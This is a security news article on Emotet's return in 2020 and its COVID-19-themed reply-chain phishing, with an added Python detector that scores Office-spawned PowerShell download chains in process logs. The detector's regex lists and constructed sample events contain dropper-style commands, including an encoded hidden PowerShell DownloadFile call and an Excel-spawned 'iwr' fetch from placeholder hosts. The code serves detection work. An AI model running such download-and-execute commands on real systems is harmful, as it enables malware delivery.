Emotet malware had been dormant from February 2020 to mid-July 2020. Now, judging by the rapid rate of updates to its features and capabilities, the developers behind the botnet appear to be compensating for the lost time with back-to-back changes to its attack tactics.

Making the headline

Recently, Emotet was found using COVID-19 related lures to target its victims in the US.
  • A security researcher has identified a COVID-19-themed phishing email that pretends to be from the 'California Fire Mechanics' but instead distributes Emotet payloads.
  • In this campaign, the Emotet operators have been using emails stolen from previous victims rather than creating a new phishing lure. The operators have been observed using reply-chain emails sent to a number of addresses.
  • The spam emails lure the victims into enabling macros, which eventually execute a PowerShell command to download the Emotet malware executable from one of three to four predefined sites.
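The chain in the last bullet (Office macro -> PowerShell -> download of an executable from one of several sites) leaves a distinctive trace in process-creation telemetry such as Sysmon Event ID 1. Below is an added example, not code from this article or from Cyware, of a small Python scorer over such events: it flags a script host spawned by an Office application, looks for download primitives and evasion switches in the command line, decodes a `-EncodedCommand` payload so URLs hidden in it are still extracted, and scores multiple fallback download sites higher. The `ts= parent= image= cmdline=` field layout, the indicator lists, the `*.example.invalid` hostnames and the alert threshold are all assumptions chosen for the example.

```python
"""Score process-creation events for the Office-macro -> PowerShell -> download
chain. Added example for this article; the events, field layout, indicator
lists and hostnames are constructed, not taken from a real campaign."""
import base64
import re
from dataclasses import dataclass, field

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Download primitives commonly used by macro droppers (assumed list; extend it).
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer"
    r"|net\.webclient|\bcurl\b|\bwget\b", re.I)
# Evasion switches: encoded command, hidden window, no profile, policy bypass.
EVASION_RE = re.compile(
    r"-e(?:nc(?:odedcommand)?)?\b|-w(?:indowstyle)?\s+hidden|-nop\b|bypass", re.I)
ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://[^\s'\"();]+", re.I)
# Constructed event layout; map your own telemetry's fields onto these names.
LINE_RE = re.compile(r"ts=(\S+) parent=(\S+) image=(\S+) cmdline=(.*)")


@dataclass
class Alert:
    ts: str
    parent: str
    image: str
    urls: list = field(default_factory=list)
    reasons: list = field(default_factory=list)
    score: int = 0


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or ''."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(line):
    """Score one process-creation event; return an Alert or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, parent, image, cmdline = m.groups()
    if parent.lower() not in OFFICE_PARENTS or image.lower() not in SCRIPT_HOSTS:
        return None  # only Office -> script-host spawns are of interest here
    alert = Alert(ts, parent, image, score=50,
                  reasons=["office-spawned-script-host"])
    # Scan the visible command line plus anything hidden behind -enc.
    visible = cmdline + " " + decode_encoded_command(cmdline)
    if DOWNLOAD_RE.search(visible):
        alert.score += 30
        alert.reasons.append("download-primitive")
    n_evasion = len(EVASION_RE.findall(cmdline))
    if n_evasion:
        alert.score += 10 * n_evasion
        alert.reasons.append(f"evasion-switches:{n_evasion}")
    alert.urls = sorted(set(URL_RE.findall(visible)))
    if len(alert.urls) >= 2:  # several fallback download sites, as in the text
        alert.score += 10
        alert.reasons.append("multiple-download-sites")
    return alert


def scan(lines, threshold=70):
    """Return the alerts at or above the (assumed) threshold, in input order."""
    return [a for a in map(analyze, lines) if a and a.score >= threshold]


def _b64_utf16(ps):
    """Encode a PowerShell string the way -EncodedCommand expects it."""
    return base64.b64encode(ps.encode("utf-16le")).decode()


# Constructed events; *.example.invalid hosts are placeholders, not real sites.
SAMPLE_LOGS = [
    "ts=2020-07-20T10:01:02Z parent=WINWORD.EXE image=powershell.exe "
    "cmdline=powershell.exe -nop -w hidden -enc " + _b64_utf16(
        "$s='http://a.example.invalid/x','http://b.example.invalid/x';"
        "(New-Object Net.WebClient).DownloadFile($s[0],'m.exe')"),
    "ts=2020-07-20T10:05:44Z parent=EXCEL.EXE image=cmd.exe "
    "cmdline=cmd /c powershell -ExecutionPolicy Bypass -c \"iwr "
    "http://c.example.invalid/p -OutFile $env:TEMP\\p.exe\"",
    "ts=2020-07-20T11:00:00Z parent=explorer.exe image=powershell.exe "
    "cmdline=powershell.exe Get-ChildItem C:\\Temp",  # benign admin use
    "ts=2020-07-20T11:02:13Z parent=WINWORD.EXE image=splwow64.exe "
    "cmdline=splwow64.exe 12288",  # benign Word print helper
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOGS):
        print(a.ts, a.parent, "->", a.image, a.score, a.reasons, a.urls)
```

Run as a script it prints the two suspicious events (the encoded Word-spawned PowerShell download and the Excel-spawned `cmd`/`iwr` chain) and stays quiet on the two benign lines. The parent-process check carries most of the weight on purpose: a legitimate macro rarely needs a script host at all, so the remaining checks only refine the score and extract the download sites for blocking.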

The antiquity of the trend

Emotet operators have followed the same pattern of sending COVID-19-themed spam to distribute malware in earlier attacks too. At the outset of the coronavirus pandemic in January, a malspam campaign was seen spreading Emotet using coronavirus infection reports as a lure, targeting users in various Japanese prefectures, including Gifu, Osaka, and Tottori.

Recent highlights

According to Check Point’s Global Threat Index for July 2020, Emotet has surged back to first place, impacting 5% of organizations globally.
  • Earlier this month, signatures of the Emotet malware were found in clickbait links posted on UNESCO’s E-team webpage, which policy practitioners use to share knowledge with their peers.
  • Within the same week, Emotet was also found using stolen emails with legitimate attachments to target its victims.

The bottom line

Despite all the new tricks and tactics rolled out within such a short span, the ultimate goal of Emotet malware still remains the same: to steal sensitive user information and install secondary payloads, such as TrickBot, Qbot, or other malware. Therefore, one needs to be vigilant when opening unknown emails and attachments, particularly those containing documents that ask you to enable macros in Microsoft Office.

Cyware Publisher